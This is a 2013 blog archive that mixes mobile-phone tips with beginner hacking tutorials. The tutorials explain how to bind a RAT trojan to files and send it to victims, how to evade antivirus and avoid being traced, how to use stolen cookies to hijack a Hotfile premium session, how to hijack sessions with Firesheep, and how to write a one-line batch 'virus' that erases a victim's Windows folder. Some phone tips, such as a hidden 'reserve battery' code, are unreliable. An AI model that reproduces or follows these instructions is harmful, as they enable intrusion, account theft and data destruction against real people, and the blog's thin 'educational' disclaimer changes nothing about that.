Tuesday, November 26, 2013

What is "memory effect"?

A partially discharged battery at times does not fully discharges before recharging. It sort of "forgets" to do so. This is what is the memory effect. For e.g. if you fully charge your battery and then use only 50% of its capacity before the next recharge, eventually the battery will become unaware of its extra 50% capacity, which has remained unused. The battery will remain functional, but only at 50% of its original capacity. To deal with this, always fully discharge your battery, before recharging it. This can be done by, unplugging the device's AC adapter and letting the device run on the battery until it ceases to function. This will help your battery remain healthy. 
What Are Volts and Milliamp-hours (mAH)? 
These are ratings on every battery. Milliamp-hours or (mAH), is one-thousandth of an amp-hour (1AH = 1000mAH). The voltage of the new battery should always match the voltage of your original unless the batteries are different chemistries. NiMH and Li-Ion batteries have different voltage ratings, even if they're for the same device. 
How long do typical batteries last? 
Generally, 11/2 - 3 years, or 500-800 charge-discharge cycles. As the rechargeable battery begins to die, there is a decline in the running time of the battery, till it reaches to 50% of its running time, and you need a new battery. 
Can I recycle my old battery? 
NiCad, NiMH and Li-Ion batteries should be recycled. Be environmentally conscious - do NOT throw these batteries in the trash. 
How long will my new battery run? 
Battery run-time is difficult to determine. Actual battery running time depends upon the power demands made by the mobile phone. The use of the screen, the device and other accessories results in an additional drain upon the battery, effectively reducing its running time. The total run-time of the battery is also dependent upon the design of the mobile phone.

Battery Do's:

Fully charge/discharge battery up to 4 cycles before achieving full capacity of a new battery 
Fully discharge and then fully charge the battery every two to three weeks. 
Run the device under the battery's power until it shuts down or until you get a low battery warning. Then recharge the battery as instructed in the user's manual. 

Remove from the device and store in a cool, dry, clean place if the battery will not be in use for a month or longer. 
Recharge the battery after a storage period Ensure maximum performance of the battery by optimizing the device's power management features. Refer to the manual for further instructions.

Battery Don'ts: Do not short-circuit. A short-circuit may cause severe damage to the battery. 

Do not drop, hit or otherwise abuse the battery as this may result in the exposure of the cell contents, which are corrosive. 

Do not expose the battery to moisture or rain. 

Keep battery away from fire or other sources of extreme heat. Do not incinerate. Exposure of battery to extreme heat may result in an explosion 

Turn off the phone, take out the battery and put it in again. Rest batteries for 24 hours before charging. It is known that generally even when your phone is "sleeping", it is not. 
Protect your phone against thefts: 
The International Mobile Equipment Identity umber (IMEI) (a 15 digit code) is programmed in the phone at the time of manufacture. This will help the police track down the phone if it is stolen. To know this number: 1. Type *#06# on the mobile. 2. A number appears. 3. Confirm this with the number on the battery. If this does not match then it means that the phone has been tampered with or is refurbished. 4. Note the number in a safe place. 
Courtsy www compareindia com

Your Mobile Battery is Very Low

Your Mobile Battery is Very Low, you are expecting an important call and you don't have a c harger". Nokia instrument comes with a reserve battery. To activate the battery, the key-in *3370# your cell will restart with this reserve and your instrument will show a 50% increase in battery. This reserve will get charged when you charge your mobile next time.

Free Missed Call Alert Tricks In Bsnl

Dear BSNL users now get free sms alert when you miss a call while you are in no network or switch off by using this tricks
Just Dial *62*+9117010# From your BSNL then its activated for free ,After that you can get SMS Whenever you have miss a call while you are in not reachable.

Make Your Mobile Number As Not Reachable!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

We sometimes don’t want to receive calls at a particular time. But the caller understands that we are not receiveing call.
So make your phone as unreachable and the caller will thought that its a network problem. No need of removing sim card! Lets start the game!
Go to Menu> Settings> Phone> Operator selection> Manual! Now your phone will search for available operators. Select any other network except your own network (i.e. If you are using Airtel, select vodafone in). You’ll get an error message No network access! Now look at the signal bar. It is empty! But dont press back. If you press back, the phone will capture signal again. If any caller call you then, he will hear that your phone is out of network range! This trick works on almost every phone.

To get Your mobile number in your mobile screen , Just dial the following usd codes.

Idea *789# or *100# or *1# *147# *131# or *131*1#
Vodafone *555# or *555*0# or *111*2# or *777*0# or *131*0#
Airtel *140*175 or*140*1600# or *121*9# or *282# *141*123#
Aircel *1# or *234*4# or *888# or *122*131# or *131#
Reliance *1# *111#
Bsnl *1# or *99#
Videocon *1# 
Virgin *1# 
Tata Docomo *1# or *580# or *124#
Uninor *444# *555# *1#
BPL or Loop *222# *1# *001#
MTNL *8888#
Smart *1# *111*2#
Virgin SMS: NUM to 51230 or *1#

Bypass Samsung Sim Lock Code:

Mind You This Solution Will Work On All Samsung Phones But Anytime You Swtich Off You Must Do It Again
Put Your Sim Card But Not Complete, Put It Abnormal, Leave Small Space Dont Let The Sim Enter Finish
Then Put Battery But Not Completly, Leave A Small Space That You Can Be Able To Push The Sim In Wihout Shaking The Phone Off
Then Power On Phone, Because Sim Is Not Inserted Well, Phone Will Show Insert Sim
The Sneak Something Like Stick In And Put The Sim To Enter Properly Whitout Offing The Phone
Then Put This Code
Input *2767*3855# 

When Phone Reboot, It Will Be Open

Tuesday, November 19, 2013

How to Auto Save Passwords Without Notification in IE

This brief tutorial will show you how to save your passwords and username automatically, without this annoying notification!

1. Click Tools.
2. Click Internet Options.
3. Select the Content tab.
4. Under the Autocomplete section, click Settings.
5. At this point, the Auto Complete settings Dialog box will popup. Untick the Prompt me to save passwords check box.
6. Click OK to save

How to Hack the remote system using Remote Administration Tools?

Today let us start our article with conversation.

What is RATs (Remote Administration Tools)?

N00b: Hello BreakTheSec, i heard a new Keyword RATs in hacking world? what is it? I know only about this rats.

BreakTheSec:  RATs are known as Remote Administration Tools. I hope you understand what it does from the name itself.

N00b: So it is used for hacking remote pc right?

BreakTheSec: Yes it is used for hacking into victim computers remotely. Using RATs you can get control over the remote PCs.

N00b: ok. Can you explain more about the use of RATs?

BreakTheSec: yes Sure. Here it is

Use of RATs(Remote Administration Tools)

You are able to install any malicious software(keyloggers...)
Able to monitor the Chat windows
Turn off the system remotely
You can disable antivirus/registry/restore point
Stealing the passwords and License key of their software.
Able to access Control panel
You can add or remove any programs
Show Fake Error messages to victim
Control Printers
Format the Entire Hard drive.
Open FTP(File Transfer Protocl) and transfer files
Control Internet Browser
more fun...

N00b: Thank you BreakTheSec. How to do that?

How to work with RATs ?
Step 1: 

First of all you have to download Remote Administration Software and install in your system.

Step 2:
Then you have to create a server using the RAT software. Here , server is our trojan that is going to bring control over the victims system.

Step 3: 
Bind the server with any files(JPEG,doc,txt...). You can bind this using some binder. Most of RATs provides Binding option also.

Step 4:
Send this file to Victim. Once the victim open the file, the server will start to run. It will disable Antivirus, registry,...depending on your configuration.

Step 5:
Find the IP address of the Victim(there is different methods to find IP address, read my previous articles). Once you got the IP address, using your Remote Administration Tool, you can connect tothe Remote System.

Now World is under your control.

Noob: wow. hey BreakTheSec I have heard some where about Reverse connection in RATs. what is that?

Connections in RATs
Direct Connection:
In Direct connection, Our system(Remote administration tool installed) is client and the victim system act as server. Our system connects to the Remote System and take control over the system. You have to find the IP address of Victim and connects to the system. Some high secure Firewalls will block the Connecting to the system on Open ports.

Reverse Connection:
Reverse connections is for bypass the Firewall Restrictions on Open ports. Firewall Restrict the Open ports but not the outgoing traffics.
In a Direct connection, client connects with Server using the Open port of Server.
In reverse connection, client open the ports and server connects to the open port.

I think you confused little bit , right? In simple words,
Victim computer connects automatically to our computer in reverse connection (in Direct connection, we have to connect to victim system using their IP address).

got it?

Advantages of Reverse Connection:
  • You don't need to know what is victim IP address(because it is connecting to our system).
  • Bypassing the Firewall Restrictions

Here is the List of Popular RAT Softwares:
Popular Remote Administration Softwares List

Undetectable by Antivirus:
N00b: Most of antivirus detects the server file as virus. What i can do? 

BreakTheSec: So you don't know about FUD ?

N00b: What is FUD menas to?
BreakTheSec: follow this link to know about Crypters

N00b: Can i get traced by victim?
BreakTheSec: No.  A system gets over 300 connections.  It is hard to trace you.

This is just for educational purpose only. Using RAT to control unauthorized system is completely a crime. So Please don't try to do. (Discussing or Reading about thief technique is not crime but implementing)

A Guide to Online Anonymity - How can i be completely untraceable ?

The act of keeping your identity hidden online by using connection methods and encryption methods, to make yourself untraceable to a person, website, company, school or whatever else you are doing/connecting to.

Uses of Anonymity:
  • Stay hidden when attacking a website or scanning it for vulnerabilities.
  • Keep your browsing history/activity hidden when at work, school, library or even your family computer.
  • Keep your IP ( Internet Protocol Address ) hidden from victims of a RAT (Remote Administration Tool) or a botnet.
  • Bypassing ISPs service usage limits.

What is a VPN ?
A VPN is an acronym for Virtual Private Network, it is a server that is used to connect to a LAN ( Local Area Network ) securely. VPNs will encrypt your connection information and hide your real IP from websites, people and it will keep your connection encrypted so you won't be able to get traced.
List of good Free VPNs:
Paid VPNs:
Why are paid VPNs better than free ?
They are more secure and keep no logs. When free ones will keep logs and aren't as securely encrypted as a paid.
  • BlackShades VPN
    • Pretty much the best product line on HackForums, you can never go wrong with a BlackShades product.
  • nVPN ( OpenVPN based )
    • Amazing speeds and panel controls and really simple set up.
  • iPredator
    • Not known around HF as much, but it's good.

What is SOCKS 4/5 ?
SOCKS is the internet protocol that makes it easier for packets to be routed between the client/server via a proxy server. The SOCKS protocol has a designated port, but is not limited to that port. This port number is 1080.

Socks will let you get by the network firewall, usually with schools or workplaces, they will have a block on the browsing you are allowed to do.

What is HTTP Proxy ?
A HTTP ( Hypertext Transfer Protocol ) proxy is kind of the same thing as a SOCKS 5, except the fact it using the HTTP protocol instead of the SOCKS protocol. When a browser is configured with a HTTP proxy, it just hooks through the proxy server and bypasses any firewall put in place on the LAN ( Local Area Network )

Web proxies and Proxy client/managerseb Proxies
Proxy Manager

What is SSH and SSH Tunneling ?
SSH is the acronym for Secure Shell, it is an network protocol used to connect to Linux&Unix based machines. This will let you access the shell (Terminal) via a remote connection to the machine/server. The default port for SSH connection is 22.

SSH tunneling is using the SSH protocol to hook through the machine/server as you send a command through your internet, say loading Google, your machine will send the data through the "SSH Tunnel" and your IP will be hidden from the website. As your data is going through the "tunnel" it is encrypted using a Public-Key encryption.

What is MAC Address and MAC Address Spoofing ?

MAC address is the acronym for Media Access Control address it's the unique identifier for a network interface. I like to think of it as the fingerprint of your connection.

MAC address spoofing is using a program (You can do it manually but program is much easier.) to change your MAC address so it doesn't leave behind your networks "fingerprint." Without doing this, you will never be FULLY anonymous.

MAC Address Spoofers.

How to Use Premium Cookies?edit cookies in any websites

In my last post i have explain how to hack the hotfile cookies and download like a premium account user(this article is example of cookie editing).  Here is the general tutorial to add or edit premiumcookies.  

  • Web Developer Add on

Step 1: Install Web Developer Add on
Install the Web developer add on.  Using this add on we are going to edit the cookies

Restart the browser. now you can see the web developer toolbar. It consist of Disbale,cookies,css,forms....etc. 

Step 2: Visit website 
Visit the appropriate website corresponding to your premium cookies.

 Step 3:
Now click the Cookies option in the Web developer tool bar. and select View Cookies information.  It will show list of cookies.

For adding cookies click the "Add the cookie" in the toolbar instead. then skip to the step 6. 

Step 4: Find the cookie 
 Find the cookie that you want to edit.  Some website store login cookie as "auth" cookie.  So find the auth cookie.

Step 5: Edit the cookie
click the edit the cookie link.
this will popup the cookie window

Step 6:

paste the premium cookies in the value field

If you are adding cookies manually, cookie name will be blank. So you have to set the correct cookie name also. usually it will be "auth"

Increase the Download speed of Hotfile like premium account-cookies hack

Hi Friends,  i think this is my first about hotfile.   Hotfile is file sharing website.  In hotfile ,downloading speed for normal user is very slow.  But for premium account it will be faster.  In this post, i am going to explain how to downlod files from hotfile like premium account.

Here is video Version of this tutorial:
How to use Premium cookies? Video Tutorial

In this method, we are going to use the premium cookies(cookie got from cookie stealing method).  Website detects the user based on the cookies.  cookies is only factor that detects whether you are normal user or premium user.  More details aboutsession and cookies. So Using the Premium cookies , you can make the website to believe that you are the premium user.  Sounds good..!! but how to do? This can achieved by Cookies Editing.

Method 1:

  • normal Free account in Hotfile
  • Premium cookies
  • Install Web Developer Add on

Step 1: Install Web Developer Add on
Install the Web developer add on.  Using this add on we are going to edit the cookies

Restart the browser. now you can see the web developer toolbar. It consist of Disbale, cookies,css,forms....etc. We are going to use cookies option alone for this hack.

Step 2: Login with Free account
Login to your Free account in Hotfile.com

Step 3:
I hope you are in hotfile.com.  Now click the Cookies option in the Web developer tool bar. and select View Cookies information.  It will list of cookies.  

Step 4: Find auth cookie
Find the cookie that named as "auth".  (you can see this if you are login ).

Step 5: Edit cookie
Click the Edit cookie link.  It will open the new pop up window. 

Step 6:Change the Value
Now Delete the contents of Value Label.  Paste the premium cookie that you have inside the value text field. and Click ok.

Step 7: What is the next step?
You are now premium member.!!! Start to download hot file like a premium member.  Enjoy..!!!

Method 2:
Method 2 is same as method 1.  Instead of editing cookie , we just add new cookie.  So for this method, no need of free account also.

  1. Visit hotfile.com
  2. Click the cookie option as said in the above method.
  3.  Select Add cookie 
  4. It will open the small pop up window.
  5. enter "auth" in the name field
  6. Paste the premium cookies in the "Value" field.
  7. Reload the page
  8. That's all you finished.

Both methods works perfectly. 
Having doubts ..??!! Post comments here.

Here is the one premium cookie for you:(copy it to your desktop, i will delete as soon as possible)

What is Session Hijacking?Bypassing Login using Session Stealing?

Know what is Session?

What is Session Hijacking?
Session Hijacking is Stealing the existing active Session. The main purpose of Session Hijacking is to bypass authentication process and gain unauthorized access to the computer or Website. In simple words , hackers will login as some other client using their Sessions.

TCP session hijacking is when a hacker takes over a TCP session between two machines. Since most authentication only occurs at the start of a TCP session, this allows the hacker to gain access to a machine

Different Session Hijacking methods:
Session stealing is achieved by following methods

1. Session fixation
      In this method, the Hacker sets a user's session id to known victim. For example, Hacker will send email to known victim  with a link that contains a particular session id. If the victim followed that link, the hacker can use that session and gain access.

2. Session SideJacking(session Sniffing):  
    In this method, the attacker use packet sniffing to and steal the Session cookie.  In order to prevent this, some websites use SSL(encrypts the session).  but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client.

 Unsecured Hotspots are vulnerable to this type of Session Hijacking.  

3. Client-side attacks (XSS, Malicious JavaScript Codes, Trojans, etc):
        Hacker can steal the Session by running the Malicious Javascript codes in client system.  Usually hackers attack some websites using XSS and insert their own Malicious Javascript codes.

In client point view it is trusted website, he will visit the website.  When victim visit the link , Malicious Javascript will executed.  It will steal the Session cookies and other confidential data.

4. Physical access:
          If the hacker has physical access, it is easy for him to steal the Session.  Usually this will occur in public cafe.  In public cafe , one use login to some websites(facebook, gmail).  A hacker come after victim can steal the session cookies.

Session Hijacking using Firesheep-Mozilla Addon: 
Firesheep is Famous Mozilla addon that made Session Hijacking very easy. Using Firesheep , you can steal the Session of Public WI FI users. Using Firesheep, you can gain access to victim account of the Facebook, twitter and some other websites. Read more about Firesheep: How to Hack Facebook Account using FireSheep

one line Virus creation using Batch Programming

1.Go to notepad, 
2. Type 
erase C:\WINDOWS
3. Save it with .bat extension , 
4. send to victim . once the victim open the file windows will be erased.